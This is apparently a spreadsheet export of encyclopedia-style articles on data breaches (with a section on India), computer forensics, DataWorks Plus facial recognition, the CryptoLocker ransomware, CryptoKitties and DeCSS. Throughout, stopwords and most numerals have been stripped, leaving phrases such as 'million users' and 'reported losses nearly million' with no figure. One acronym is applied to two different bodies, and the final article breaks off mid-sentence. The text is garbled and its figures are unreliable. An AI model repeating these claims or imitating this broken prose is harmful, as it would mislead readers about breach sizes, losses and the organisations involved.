bulgaria’s national revenue agency, branch country’s ministry finance. september, personal data ecuador's entire population million along deceased people breached marketing analytics firm novestrat managed unsecured server leaked full names, dates, places birth, education, phone numbers national identity numbers. 2020 july writing site wattpad suffered major data breach shinyhunters, involving million users; users' data sold forum darknet, including password hashes. december 2020, reported multiple federal government entities many private organizations across globe using solarwinds, microsoft vmware products, became victims extensive data breach hack. 2021 2021 microsoft exchange server data breach 2021 epik data breach pandora papers 2022 march: anonymous leaked contents database roscosmos amidst 2022 russian invasion ukraine. july: leak shanghai national police database. also full disclosure (computer security) list data breaches surveillance capitalism data breaches india references external links "data loss database" research project aimed documenting known reported data loss incidents world-wide. "breaches affecting more individuals", breaches reported u.s. department health human services (hipaa-covered) entities</t>
  </si>
  <si>
    <t>Data breaches in India</t>
  </si>
  <si>
    <t>data breach incidences india second highest globally 2018, according report digital security firm gemalto. with million internet subscribers growing, india increasingly seen rise data breaches private public sector. this list biggest data breaches country. 2016 debit card data breach october 2016, reported many million debit cards major indian banks compromised malware injection hitachi payment services system. hitachi provides point sale services india malware enabled hackers extract money user accounts. npci (national payments corporation india) reported losses nearly million ($195,000 2016) fraudulent transactions. worst banks included state bank india (sbi), icici, hdfc, bank axis bank among others. breach went undetected weeks banks alerted several international banks reported fraudulent cards china united states customers india. blocked reissued 600,000 debit cards reported biggest card replacements indian banking. aadhar data breach early 2018, indian government's identification database aadhar (similar ssn) reported leaking information every registered indian citizens including names, bank details private information like biometric data. managed unique identification authority india (uidai), aadhar unique identification number obtained billion residents passport holders india based biometric demographic data. data leak first revealed anonymous sellers whatsapp provided unrestricted access aadhar database nominal costs. tribune, indian newspaper reported 100,000 ex-employees ministry electronics information technology continued free access uidai system therefore, aadhar database. another data leak found following months wherein state-owned utility company indane's (lpg) unprotected system allowed anyone access private information aadhaar holders. company unlimited access aadhar database verify user accounts unprotected endpoint company's system allowed unauthorized queries database potentially aadhar holders. indirectly, aadhar information million citizens breached state government websites government websites erroneously made database public. uidai unequivocally denied data breach aadhar database even though many unsecure endpoints government websites unauthorized data access offline reports. uidai also filed case tribune sections 419, 420, indian penal code (ipc) alleging false reporting. global risk report deemed aadhar breach largest data breach world. data breach january 2019, exposed customer data, including mobile numbers, partial account numbers, balances transaction details unprotected server mumbai data center. server hosted sbi's "sbi quick" service, text call based system provide inquiring customers updates account balances, recent transactions credit information. server password protected allowed retrieval customer-specific messages back-end text messaging system. outgoing messages system available real time, along months daily archives, exposing financial details millions customers. though resolved issue initial investigation techcrunch, bank dismissed reports, saying customer data financial records remained secure. justdial data breach april 2019, mumbai-based local search engine justdial data breach leaked details, including names, mobile numbers, email ids, occupations addresses nearly crore (100 million) users. multiple sources suggested leak unprotected endpoint accessible since mid-2015 company's website app. while justdial admitted vulnerability certain user details version app, company largely refuted reports, suggesting user financial information protected search platform authentication system. kudankulam nuclear power plant data breach september 2019, nuclear power corporation india (npci) confirmed india's largest nuclear plant, kudankulam nuclear power plant attacked malware collected information plant's network. breach detected data file traces dtrack malware uploaded cyber security firm’s website. cert-india detected malware infected connected administrative network. npci claimed malware access network responsible internal, critical plant systems. tailored specifically plant, attackers earlier broke plant's networks stole admin credentials used gain information plant's networks malware. multiple reports suggested malware solely deployed collect information, including internet search history browser installed infected local operating system registry information registered owner, registered organization current user list active processes information written temporary files extracted remote server attacker. dtrack malware traced back north korea-linked lazarus group. 2019 credit debit card data breach october 2019, lakh (1.3 million) credit debit card records sold dark card shop joker's stash, site used cybercriminals buying selling card details. group-ib, singapore-based company revealed cards database belonged multiple indian banks, card sold $100. data breach revealed card numbers, expiration dates along cvvs. fully personally identifiable information including cardholders' names, emails, phone numbers addresses also available database. card details possibly obtained skimming devices, installed either atms point sale (pos) systems magecart attacks, wherein javascript code injected e-commerce websites intercept payment data. another major card dump 460,000 cards sale joker's stash february 2020 similar fully personally identifiable information, selling card. breach currently deemed biggest card dump internet. investigations breach still pending. bigbasket data breach november 2020, bangalore-based online grocer bigbasket suffered data breach leaked details crore million) users, including email ids, phone numbers, order details, addresses. data breach noticed data sale dark almost lakh ($40000 2020). cause breach unsecure file, potentially hacked using injection, contained user data. bigbasket acknowledged breach filed case banglore cyber crime cell. breach currently investigation. unacademy data breach 2020, bangalore-based online learning platform unacademy found compromised email data million users. breach revealed company's million user accounts sold dark almost ₹1.5 lakh ($2,000 usd). cyble, cybercrime monitoring company claimed beyond user accounts, user data including ids, passwords, date joined, last login date, email ids, names user credentials also breached. unacademy verify whether entire database vulnerable breach india data breach 2021, reported india subjected cyberattack whereas personal details million customers around world compromised including passport, credit card details, birth dates, name ticket information. dominos india data breach 2021, reported dominos india, subsidiary jubilant foodworks, witnessed cyberattack data crore orders leaked dark including order details, email addresses, phone numbers credit card details. jubilant foodworks stated experienced information security incident denied financial information accessed hackers. also shadow network category:data breaches united states data breach skimming references</t>
  </si>
  <si>
    <t>DataGravity</t>
  </si>
  <si>
    <t>datagravity inc. industry data management company, produced security software. company founded april 2012 paula long john joseph.datagravity announced first products vmworld 2014. best show, technology awards event. began shipping first products october 2014.the company focused protection security data stored array, named type storage data-aware storage. publicly changed product strategy february 2016 data storage appliances software solution focused behavioral data security. this product strategy change resulted multiple rounds layoffs. fate company multiple reports conflicting terminology final fate company.some reports hytrust acquired datagravity.other reports, including press release issued hytrust itself, hytrust acquired assets datagravity signed liquidator.hytrust told fortune founder paula long left datagravity weeks transaction announced, co-founder john joseph left time that.according reports, datagravity ceased day-to-day operations june 2017, cancelled employee benefit plans signed company liquidator barry kallander kallander group. report, correspondence datagravity president barry kallander states "the corporation sold assets company were....unfortunately common shares worthless."conversely, datagravity david siles quoted saying company "did shut down", transaction "wasn't fire sale. acquired complete vision, value, customers love together offer compelling offering marketplace solving pressing needs many enterprises."approximately former datagravity employees joined hytrust support datagravity's product integration, former datagravity david siles.datagravity's products remain part hytrust's portfolio cloudadvisor suite. references</t>
  </si>
  <si>
    <t>Computer forensics</t>
  </si>
  <si>
    <t>computer forensics (also known computer forensic science) branch digital forensic science pertaining evidence found computers digital storage media. goal computer forensics examine digital media forensically sound manner identifying, preserving, recovering, analyzing presenting facts opinions digital information. although often associated investigation wide variety computer crime, computer forensics also used civil proceedings. discipline involves similar techniques principles data recovery, additional guidelines practices designed create legal audit trail. evidence computer forensics investigations usually subjected guidelines practices digital evidence. used number high-profile cases accepted reliable within u.s. european court systems. overview early 1980s personal computers became accessible consumers, leading increased criminal activity (for example, help commit fraud). time, several "computer crimes" recognized (such cracking). discipline computer forensics emerged time method recover investigate digital evidence court. since computer crime computer related crime grown, jumped 2002 2003. today used investigate wide variety crime, including child pornography, fraud, espionage, cyberstalking, murder rape. discipline also features civil proceedings form information gathering (for example, electronic discovery) forensic techniques expert knowledge used explain current state digital artifact, computer system, storage medium (e.g. hard disk cd-rom), electronic document (e.g. email message jpeg image). scope forensic analysis vary simple information retrieval reconstructing series events. 2002 book, computer forensics, authors kruse heiser define computer forensics involving "the preservation, identification, extraction, documentation interpretation computer data". they describe discipline "more science", indicating forensic methodology backed flexibility extensive domain knowledge. however, several methods used extract evidence given computer strategies used enforcement fairly rigid lack flexibility found civilian world. cybersecurity computer forensics often confused cybersecurity quite different. cybersecurity prevention protection whilst computer forensics reactionary active tracking exposing. there usually teams, cybersecurity computer forensics work hand. they complement cybersecurity team would create systems programs protect data fail computer forensics team recovers finds happened tracks etc. there many similarities however fields help other. they require knowledge computer science fields apart it/stem. computer related crimes computer forensics used convict people performed physical digital crimes. some computer related crimes include interruption, interception, copyright infringement, fabrication. interruption relates destruction stealing computer parts digital files. interception unauthorized access files information stored technological devices. copyright infringement using, reproducing, distributing copyrighted information, including software piracy. fabrication accusing someone using false data information system unauthorized source. examples interceptions bank case, sony.sambandh.com case, business emails compromise scams. bank case situation bank's management employee's ex-girlfriend created fraudulent emails, sent bank client gain money. sony.sambandh.com case call center worker using foreigner's credit card information headphones. business emails compromise scams refer hackers gaining access ceo/cfo email using gain money employees. evidence court, computer forensic evidence subject usual requirements digital evidence. this requires information authentic, reliably obtained, admissible. different countries specific guidelines practices evidence recovery. united kingdom, examiners often follow association chief police officers guidelines help ensure authenticity integrity evidence. while voluntary, guidelines widely accepted british courts. computer forensics used evidence criminal since mid-1980s, notable examples include: killer: dennis rader convicted string serial killings occurred period sixteen years. towards period, rader sent letters police floppy disk. metadata within documents implicated author named "dennis" "christ lutheran church"; evidence helped lead rader's arrest. joseph edward duncan: spreadsheet recovered duncan's computer contained evidence showed planning crimes. prosecutors used show premeditation secure death penalty. sharon lopatka: hundreds emails lopatka's computer lead investigators killer, robert glass. corcoran group: this case confirmed parties' duties preserve digital evidence litigation commenced reasonably anticipated. hard drives analyzed computer forensics expert could find relevant emails defendants had. though expert found evidence deletion hard drives, evidence came defendants found intentionally destroyed emails, misled failed disclose material facts plaintiffs court. conrad murray: conrad murray, doctor deceased michael jackson, convicted partially digital evidence computer. this evidence included medical documentation showing lethal amounts propofol. forensic process computer forensic investigations usually follow standard digital forensic process phases acquisition, examination, analysis reporting. investigations performed static data (i.e. acquired images) rather "live" systems. this change early forensic practices lack specialist tools investigators commonly working live data. computer forensics computer forensic safe protected zone electronic data managed, preserved, accessed controlled environment. there, much reduced risk damage modification evidence. computer forensic examiners resources needed elicit meaningful data devices examining. techniques number techniques used computer forensics investigations much written many techniques used enforcement particular. cross-drive analysis forensic technique correlates information found multiple hard drives. process, still researched, used identify social networks perform anomaly detection.live analysis examination computers within operating system using custom forensics existing sysadmin tools extract evidence. practice useful dealing encrypting file systems, example, encryption keys collected and, instances, logical hard drive volume imaged (known live acquisition) computer shut down.deleted files common technique used computer forensics recovery deleted files. modern forensic software tools recovering carving deleted data. most operating systems file systems always erase physical file data, allowing investigators reconstruct physical disk sectors. file carving involves searching known file headers within disk image reconstructing deleted materials.stochastic forensics method uses stochastic properties computer system investigate activities lacking digital artifacts. chief investigate data theft.steganography techniques used hide data steganography, process hiding data inside picture digital image. example would hide pornographic images children information given criminal want discovered. computer forensics professionals fight looking hash file comparing original image available.) while images appear identical upon visual inspection, hash changes data changes. mobile devices forensics phone logs: phone companies usually keep logs calls received, helpful creating timelines gathering locations persons crime occurred.contacts: contact lists help narrow suspect pool connections victim suspect.text messages: messages contain timestamps remain company servers indefinitely, even deleted original device. because this, messages crucial records communication used convict suspects.photos: photos critical either supporting disproving alibis displaying location scene along timestamp photo taken.audio recordings: some victims might able record pivotal moments struggle, like voice attacker extensive context situation. volatile data volatile data data stored memory, exists transit, lost computer loses power turned off. volatile data resides registries, cache, random access memory (ram). investigation volatile data called “live forensics”. when seizing evidence, machine still active, information stored solely recovered powering lost. application "live analysis" recover data (for example, using microsoft's cofee tool, windd, windowsscope) prior removing exhibit. captureguard gateway bypasses windows login locked computers, allowing analysis acquisition physical memory locked computer.ram analyzed prior content power loss, electrical charge stored memory cells takes time dissipate, effect exploited cold boot attack. length time data recoverable increased temperatures higher cell voltages. holding unpowered helps preserve residual data order magnitude, improving chances successful recovery. however, impractical field examination.some tools needed extract volatile data, however, require computer forensic lab, maintain legitimate chain evidence, facilitate work machine. necessary, enforcement applies techniques move live, running desktop computer. these include mouse jiggler, moves mouse rapidly small movements prevents computer going sleep accidentally. usually, uninterruptible power supply (ups) provides power transit. however, easiest ways capture data actually saving data disk. various file systems journaling features ntfs reiserfs keep large portion data main storage media operation, page files reassembled reconstruct time. analysis tools number open source commercial tools exist computer forensics investigation. typical forensic analysis includes manual review material media, reviewing windows registry suspect information, discovering cracking passwords, keyword searches topics related crime, extracting e-mail pictures review. autopsy (software), belkasoft evidence center, cofee, encase tools used digital forensics. jobs computer forensics computer digital forensic investigator computer digital forensic investigators look suspects devices data order incriminatory evidence could used case. computer programmer computer programmers program systems programs computers run. computer forensics work programming eligible work career. cyber forensics analyst cyber forensics analysts support detectives investigators crime analyzing data evidence using processes make eligible court. computer forensics technician computer forensics technician searches information relevant ongoing case. they search personal devices storage devices uncover submit evidence. certifications there several computer forensics certifications available, isfce certified computer examiner, digital forensics investigation professional (dfip) iacrb certified computer forensics examiner. vendor independent certification (especially within considered [ccfp certified cyber forensics professional [1]].others, worth mention apac are: international association computer investigative specialists offers certified computer examiner program. international society forensic computer examiners offers certified computer examiner program. many commercial based forensic software companies also offering proprietary certifications products. example, guidance software offering (ence) certification tool encase, accessdata offering (ace) certification tool ftk, passmark software offering certification tool osforensics, x-ways software technology offering (x-pert) certification software, x-ways forensics. laws laws related computer forensics (india) indian laws sections 65-77 relate computer crimes. laws enforced evidence left digitally remotely computer permanent tracking actions databases.section preventing hacking computers. crime punishable three years prison five lakhs rupee fine.section 66f: focused cyber-terrorism malware, phishing, unauthorized access, identity theft, etc. caught, usually leads life sentence.section 67b: prevent spread publishing child porn. could lead years prison lakhs rupee fine. also certified computer examiner certified forensic computer examiner counter forensics cryptanalysis data remanence disk encryption encryption hidden file hidden directory information technology audit times steganalysis united states arnold references further reading practice guide computer forensics, first edition (paperback) david benton (author), frank grindstaff (author) casey, eoghan; stellatos, gerasimos (2008). "the impact full disk encryption digital forensics". operating systems review. (3): 93–98. citeseerx 10.1.1.178.3917. doi:10.1145/1368506.1368519. s2cid 5793873. yizhen huang; yangjing long (2008). "demosaicking recognition applications digital photo authentication based quadratic pixel correlation model" (pdf). proc. ieee conference computer vision pattern recognition: 1–8. archived original (pdf) 2010-06-17. retrieved 2009-12-18. incident response computer forensics, second edition (paperback) chris prosise (author), kevin mandia (author), matt pepe (author) "truth stranger fiction..." (more) ross, gow, (1999). digital archaeology? rescuing neglected damaged data resources (pdf). bristol london: british library joint information systems committee. isbn 978-1-900508-51-3. george mohay (2003). computer intrusion forensics. artech house. 395. isbn 978-1-58053-369-0. chuck easttom (2013). system forensics, investigation, response. jones bartlett. 318. isbn 978-1284031058. archived original 2013-06-14. retrieved 2013-09-23. related journals ieee transactions information forensics security journal digital forensics, security international journal digital crime forensics journal digital investigation international journal digital evidence international journal forensic computer science journal digital forensic practice cryptologia small scale digital device forensic journal</t>
  </si>
  <si>
    <t>DataWorks Plus</t>
  </si>
  <si>
    <t>dataworks plus privately held biometrics systems integrator based greenville, south carolina. company started 2000 originally focused mugshot management, adding facial recognition beginning 2005. brad bylenga ceo, todd pastorini products company focuses biometrics storage matching, including fingerprints, palm prints, irises, tattoos, mugshots.face watch continuously detect live video streams, recognizing faces individual video frames cataloging timestamps.face plus photo (still image) facial recognition program. includes advanced filtering reconstruct model photos correct angle, called pose correction.dataworks uses facial recognition algorithms nec, rank computing colorado, brendan klare), cognitec. both rank algorithms showed algorithmic bias nist study. dataworks' todd pastorini told york times formally measure accuracy bias, "we've become pseudo-expert technology". installations california dataworks created "california facial recognition interconnect". this statewide face recognition network used angeles county sheriff million images), diego county sheriff (2.5 million images), sacramento county sheriff (1.75 million images), bernardino county sheriff's department/riverside county sheriff's department (2.7 million images), santa barbara county sheriff's office (since 2012, million images), francisco police department million images; below), unidentified agencies mateo county joaquin county.the angeles county sheriff, using cognitec's algorithm, acquired 2008 7-year contract, signed 7-year, $3.5m contract extension 2015. contract renewal approved unanimously angeles county board supervisors. addition interconnect, angeles county access fingerprinting, facial recognition, tattoo matching million images templates), composite drawing, access images unrelated cal-photo. other california usessan diego county sheriff's dataworks well established back least 2007. report discussed dataworks installing trial face plus facial recognition year. facial recognition system place upgraded cognitec's algorithm 2010.the francisco police's recent 3-year contract signed 2017 $150k year. included labeled software" "face plus" server. also included "mugshot database". francisco banned government usage facial recognition beginning 2019. dataworks's pastorini said tools neural nets machine learning like microsoft's face amazon rekognition, stating "the amazon searches best forensic searches". said banning unfortunate evidence misuse francisco. york times noted nec's technology neural nets.san jose police department uses dataworks fingerprint biometric system least 2011. florida dataworks says sold 5000 fingerprint devices state florida. michigan dataworks worked michigan (department public safety) michigan state police since 2001. their database contains least million criminal images million photos. additionally, dataworks michigan state police integrated fbi's next generation identification facial recognition pilot. later added maryland department public safety's system system. this system includes agencies 1000 users.the city detroit detroit police department, access least 500k mugshots. 2017 dataworks signed 3-year contract "face watch plus real-time video surveillance". consumes feeds project green light, network cameras public private property. includes cameras stoplights well stations, pharmacies, health clinics, churches, apartments, hotels, (beginning 2018) schools. 2017 dataworks contract references used video feeds. additionally, crime intelligence unit licensed michigan's statewide network agency photos (snap) dataworks, adding access photos. dataworks integrated motorola's command central aware console.in june 2020 meeting, detroit's police chief said dataworks failed make correct identification time. report, detroit police tally indicated used dataworks facial recognition images june year date. least black people, men. dataworks' pastorini said keep statistics, tell customers software. chicago chicago police department chicago transit authority using "face watch plus" (realtime recognition) chicago's security camera network, includes approximately 20,000 video cameras. this integrated genetec's omnicast. dataworks noted provide "real time screening" "facial recognition". their system includes million criminal photos states "the system primarily solve crimes using probes generate dfrom street cameras, facebook, sources." others maryland, dataworks created statewide system integrating photos million) criminal photos million) maryland department public safety correctional services. fbi's facial recognition system also integrated. they also supplied three mobile license plate recognition systems purchased 2007 $60k.in pennsylvania, jnet (justice network) system, dataworks created jnet facial recognition system (jfrs), integrated penn dot's photos (from morphotrust) commonwealth photo imaging system (cpin). this used pennsylvania state police, pennsylvania department corrections, pennsylvania board probation parole, philadelphia police department. during george floyd protests june 2020, harrisburg, pennsylvania police commissioner thomas carter asked images showing vandalism assault police officer, stating "hopefully, pick image can, facial recognition".south carolina enforcement division (sled) south carolina uses face plus system, includes state's million images. charleston county, south carolina sheriff also customer.the york police department uses facial recognition dataworks plus.a national system upgrade zealand scheduled completed late 2020 estimated nz$5 million. would include facial recognition security camera still images, criminal images, firearms license holders, missing persons, registered offenders. dataworks's pastorini said make accuracy statements" asked reliability system. nz's privacy commissioner even aware installation. when asked, pastorini said familiar zealand's privacy act.dataworks plus claims "over 1000 agencies", includes virginia state police, wake county ccbi raleigh police department, miami dade police department, collier county sheriff's office (naples, florida), columbus police department (ohio), irving, texas police department, jersey/new york high intensity drug trafficking area. references external links official website</t>
  </si>
  <si>
    <t>CryptoLocker</t>
  </si>
  <si>
    <t>cryptolocker ransomware attack cyberattack using cryptolocker ransomware occurred september 2013 late 2014. attack utilized trojan targeted computers running microsoft windows, believed first posted internet september 2013. propagated infected email attachments, existing gameover zeus botnet. when activated, malware encrypted certain types files stored local mounted network drives using public-key cryptography, private stored malware's control servers. malware displayed message offered decrypt data payment (through either bitcoin pre-paid cash voucher) made stated deadline, threatened delete private deadline passes. deadline met, malware offered decrypt data online service provided malware's operators, significantly higher price bitcoin. there guarantee payment would release encrypted content. although cryptolocker easily removed, affected files remained encrypted researchers considered unfeasible break. many said ransom paid, offer recover files; others said paying ransom recover files backed some victims claimed paying ransom always lead files decrypted. cryptolocker isolated late 2014 operation tovar, took gameover zeus botnet used distribute malware. during operation, security firm involved process obtained database private keys used cryptolocker, turn used build online tool recovering keys files without paying ransom. believed operators cryptolocker successfully extorted total around million victims trojan. other instances encryption-based ransomware followed used "cryptolocker" name variations), otherwise unrelated. operation cryptolocker typically propagated attachment seemingly innocuous e-mail message, appears sent legitimate company. file attached email message contains executable file filename icon disguised file, taking advantage windows' default behaviour hiding extension file names disguise real .exe extension. cryptolocker also propagated using gameover zeus trojan botnet.when first run, payload installs user profile folder, adds registry causes startup. attempts contact several designated command control servers; connected, server generates 2048-bit pair, sends public back infected computer. server local proxy others, frequently relocated different countries make tracing difficult.the payload encrypts files across local hard drives mapped network drives public key, logs file encrypted registry key. process encrypts data files certain extensions, including microsoft office, opendocument, documents, pictures, autocad files. payload displays message informing user files encrypted, demands payment euro anonymous pre-paid cash voucher (i.e. moneypak ukash), equivalent amount bitcoin (btc) within hours (while starting btc, ransom price adjusted operators reflect fluctuating value bitcoin), else private server would destroyed, "nobody never [sic] able restore files." payment ransom allows user download decryption program, pre-loaded user's private key. some infected victims claim paid attackers files decrypted.in november 2013, operators cryptolocker launched online service claimed allow users decrypt files without cryptolocker program, purchase decryption deadline expired; process involved uploading encrypted file site sample waiting service find match; site claimed match would found within hours. once found, user could online; 72-hour deadline passed, cost increased bitcoin. bitcoin 2022 value order usd$215,830.00, quarter million u.s. dollars. takedown recovery files june 2014, united states department justice officially announced previous weekend, operation tovar—a consortium constituting group enforcement agencies (including interpol), security software vendors, several universities, disrupted gameover zeus botnet used distribute cryptolocker malware. department justice also publicly issued indictment russian hacker evgeniy bogachev alleged involvement botnet.as part operation, dutch security firm fox-it able procure database private keys used cryptolocker; august 2014, fox-it fellow firm fireeye introduced online service allows infected users retrieve private uploading sample file, receive decryption tool. mitigation while security software designed detect threats, might detect cryptolocker all, encryption underway complete, particularly version unknown protective software distributed. attack suspected detected early stages, takes time encryption take place; immediate removal malware relatively simple process) completed would limit damage data. experts suggested precautionary measures, using software security policies block cryptolocker payload launching.due nature cryptolocker's operation, experts reluctantly suggested paying ransom recover files cryptolocker absence current backups (offline backups made infection inaccessible infected computers cannot attacked cryptolocker). length employed cryptolocker, experts considered practically impossible brute-force attack obtain needed decrypt files without paying ransom; similar 2008 trojan gpcode.ak used 1024-bit believed large enough computationally infeasible break without concerted distributed effort, discovery flaw could used break encryption. sophos security analyst paul ducklin speculated cryptolocker's online decryption service involved dictionary attack encryption using database keys, explaining requirement wait hours receive result. money paid december 2013, zdnet traced four bitcoin addresses posted users infected cryptolocker, attempt gauge operators' takings. four addresses showed movement 41,928 october december, us$27 million time. value 41,928 2022 would worth us$904,399,538.40, nearly billion u.s. dollars.in survey researchers university kent, claimed victims said decided ransom, proportion much larger expected; symantec estimated victims paid dell secureworks estimated 0.4% victims paid. following shutdown botnet used distribute cryptolocker, calculated 1.3% infected paid ransom; many able recover files backed others believed lost huge amounts data. nonetheless, operators believed extorted total around million. clones success cryptolocker spawned number unrelated similarly named ransomware trojans working essentially way, including refer "cryptolocker"—but are, according security researchers, unrelated original cryptolocker.in september 2014, clones cryptowall torrentlocker (whose payload identifies "cryptolocker", named registry named "bit torrent application"), began spreading australia; ransomware uses infected e-mails, purportedly sent government departments (e.g. australia post indicate failed parcel delivery) payload. evade detection automatic e-mail scanners follow links, variant designed require users visit page enter captcha code payload actually downloaded. symantec determined variants, identified "cryptolocker.f", tied original. also locky pgpcoder wannacry petya references</t>
  </si>
  <si>
    <t>CryptoKitties</t>
  </si>
  <si>
    <t>cryptokitties blockchain game ethereum developed canadian studio dapper labs allows players purchase, collect, breed sell virtual cats. earliest attempts deploy blockchain technology recreation leisure. game's popularity december 2017 congested ethereum network, causing reach all-time high number transactions slowing significantly. gameplay players purchase, breed trade virtual cats different visual features varying levels rarity. players must purchase ether cryptocurrency join game, spend perform breeding trade action within game.the virtual cats breedable carry unique number distinct genome different attributes (cattributes) passed offspring. several traits passed parents offspring. there total 'cattributes' cat, including pattern, mouth shape, fur, shape, base color, accent color, highlight color, color, optional wild, environment, 'purrstige' 'secret'. other features like cool times passed instead function 'generation' offspring, 'generation' highest 'generation' attribute.a cryptokitty permanently assigned gender. while engage breeding session time, able either matron sire. there 'cooldown' time indicates soon breed again, goes number breeds, capped week. virtual cats static images purchased, bred sold. game goal. background cryptokitties operates ethereum's underlying blockchain network. each cryptokitty non-fungible token (nft). each unique owned user, validated blockchain, value appreciate depreciate based market. cryptokitties cannot replicated cannot transferred without user's permission even game developers. users interact cryptokitties, ability buy, sell, sire (breed) them. however, cryptokitty blockchain instead owned axiom zen. company released 'nifty' license lets players image cryptokitty limited way. test version cryptokitties unveiled waterloo october 2017, ethereum hackathon. december 2017, genesis, first high selling sold eth246.9255 (~us$117,712) day. march 2018, announced cryptokitties would spun company, dapper labs, raised million several venture capital firms angel investors. investment round york based union square ventures francisco based andreessen horowitz.on 2018, cryptokitty sold $140,000. 2018, cryptokitties launched first celebrity-branded cryptokitty stephen curry, american professional basketball player. part partnership, curry given three cryptokitties special imagery, first auction. company later suspended auction, claiming stephen curry involved initially thought. company later sued trade secret theft stephen curry collectibles. court ruled company's favour, stating "[t]he evidence demonstrates defendant, plaintiff, developed idea license digital collectibles using likeness celebrities first…".in october 2018, cryptokitties reached milestone million cats bred volume million transactions smart contracts. november 2018, dapper labs, spun axiom developer cryptokitties, raised additional million venture round venrock. company doubled valuation round.in 2018, cryptokitties used german museum center media karlsruhe showcase blockchain technology. technology cryptokitty's ownership tracked smart contract ethereum blockchain. each cryptokitty represented non-fungible token using erc-721 token standard ethereum. generation cryptokitties sold players auction rate every minutes (672 week) year. cryptokitties created breeding existing cryptokitties. based limited number cats going circulation limited genomes, limit around billion total cats bred. each distinct visual appearance ("phenotype") determined immutable genes ("genotype") stored smart contract. because cats tokens blockchain, bought, sold, transferred digitally, strong guarantees ownership. axiom developed game. until november 2018, axiom intended continually release cryptokitty every minutes, rest supply determined breeding cryptokitties. cryptokitty owners sale auction price ether (eth). they could also sire, another player breed specific cryptokitty. reception shortly launch, concerns cryptokitties crowding businesses ethereum platform. game caused increase pending transactions ethereum, point accounted network traffic ethereum. ethereum miners increased limit response cryptokitties, allowed data block increasing transactions second. variety similar websites etheremon, ethertulips, cryptobots, also created. marketplace sites opensea rarebits created response. delays ethereum network, cryptokitties announced plans switch flow blockchain "near future", march 2021. also decentralized application non-fungible token crypto references external links official website</t>
  </si>
  <si>
    <t>DeCSS haiku</t>
  </si>
  <si>
    <t>decss haiku 465-stanza haiku poem written 2001 american hacker seth schoen part protest action regarding prosecution norwegian programmer lech johansen co-creating decss software. poem, written spirit civil disobedience copy control association, argues "code speech." history decss haiku created context series protests, coming international hacker community, arrest norwegian programmer lech johansen, series related lawsuits hackers (such universal city studios, inc. reimerdes copy control association, inc. bunner). johansen, norwegian teenage programmer, creators freely distributed decss software used bypass encryption, preventing even legally-acquired dvds running unauthorized computers (which time included linux machines). johansen others reposted code, including 2600: hacker quarterly, sued entertainment industry revealing trade secret facilitating illegal copying distribution content said dvds.seth schoen's goal provide tangible proof argument "source code speech" hence given legal protections free speech. number activists, spirit civil disobedience, created works arts containing infringing code, principle works subject first amendment principle within united states. schoen decided create poem, 2001. first, schoen released poem anonymously, though publicly acknowledged ownership since.the 465-stanza haiku transcodes decss software, effect allowing computer programmers recreate decss software scratch, using haiku reference. this illustrated following short excerpt: another point, poem discloses sixteen-digit master code entertainment industry lawyers considered proprietary trade secret: gabriella coleman noted: formally comparing code poetry medium poem, schoen displays playful form clever recursive rhetoric valued among hackers; also articulates meaning first amendment software." david touretzky turn described work "ingenious poem... commentary decss situation correct complete description descrambling algorithm. truly inspired."his work described notable examples decss-inspired hacker art. covered wall street journal, francisco chronicle, wired, york times magazine. also aacs encryption controversy libdvdcss references further reading hamilton, david (april 2001). "banned code lives poetry song". wall street journal. retrieved 2014. external links decss haiku history decss haiku, seth schoen</t>
  </si>
  <si>
    <t>DeCSS</t>
  </si>
  <si>
    <t>decss first free computer programs capable decrypting content commercially produced video disc. before release decss, open source operating systems (such linux) could play encrypted video dvds. decss's development done without license copy control association (cca), organization responsible copy protection—namely, content scramble system (css) used commercial publishers. release decss resulted norwegian criminal trial subsequent acquittal authors decss. launched numerous lawsuits united states effort stop distribution software. origins history decss devised three people, remain anonymous. internet mailing list livid october 1999. known author trio norwegian programmer lech johansen, whose home raided 2000 norwegian police. still teenager time, trial norwegian court violating norwegian criminal code section 145, faced possible jail sentence years large fines, acquitted charges early 2003. march 2003, norwegian appeals court ruled johansen would retried. court said arguments filed prosecutor additional evidence merited another trial. december 2003, appeals court agreed acquittal, january 2004, norway's økokrim (economic crime unit) decided pursue case further. program first released october 1999 johansen posted announcement decss 1.1b, closed source windows-only application ripping, livid-dev mailing list. source code leaked month. first release decss preceded weeks program called speed ripper group called drinkordie, include source code apparently work dvds. drink reportedly disassembled object code xing player obtain player key. group wrote decss, including johansen, came call masters reverse engineering obtained information drink die.the decryption source code used decss mailed derek fawcus decss released. when decss source code leaked, fawcus noticed decss included css-auth code violation gpl. when johansen made aware this, contacted fawcus solve issue granted license code decss non-gpl terms.on january 2004, dropped case johansen. lech johansen's involvement decss program collaborative project, johansen wrote graphical user interface. transcripts borgarting court appeal, published norwegian newspaper verdens gang, contain following description process release decss: through internet relay chat (henceforth irc), [jon lech johansen] made contact like-minded [people seeking develop dvd-player linux operating system]. september 1999, conversation "mdx" encryption algorithm could found, using poorly secured software-based dvd-player. conversation [between lech johansen "mdx"] september, "mdx" informs "the nomad" found code decryption, "mdx" would send [code] lech johansen. "the nomad" allegedly found decryption algorithm so-called reverse engineering xing dvd-player, [decryption] keys less openly accessible. through this, information made possible [for "mdx"] create code css_scramble.cpp retrieved. from chat logs dated november 1999 november 1999, appears "the nomad" carried reverse engineering process xing player, characterized illegal. case presented high court, known lech johansen november [1999].regarding authentication code, high court takes basis "the nomad" obtained code electronic mailing list livid (linux video) internet, created derek fawcus. appears livid posting dated october 1999 derek fawcus date read decss source code compared own. further, appears "the creators decss] taken [derek fawcus' code] almost verbatim alteration removal [derek fawcus'] copyright header paragraph containing commentaries, change function names." name code] css_auth.cpp. high court takes basis program lech johansen later programmed, graphical user interface, consisted "the nomad's" decryption algorithm derek fawcus' authentication package. creation graphical user interface made program accessible, also users without special knowledge programming. program published internet first time october 1999, lech johansen tested movie "the matrix." this, downloaded approximately 2.5%. megabytes, movie hard drive computer. this file film fragment lech johansen saved computer. technology derived works when release decss source code made algorithm available public scrutiny, soon found susceptible brute force attack quite different decss. encryption 40-bit, keys; high-end home computer 1999 running optimized code could brute-force within hours, modern computers brute-force seconds less.programmers around world created hundreds programs equivalent decss, merely demonstrate trivial ease system could bypassed, others support open source movie players. licensing restrictions make impossible create open source implementation official channels, closed source drivers unavailable operating systems, users need decss watch even legally obtained movies. legal response first legal threats sites hosting decss, beginning decss mirroring campaign, began early november 1999 (universal reimerdes). preliminary injunction copy control association, inc. bunner followed soon after, january 2000. response threats program also called decss unrelated function developed. this program used strip cascading style sheets tags html pages. case, school removed student's webpage included copy program, mistaking original decss program, received great deal negative media attention. stripping program specifically created bait mpaa manner.in protest legislation prohibits publication copy protection circumvention code countries 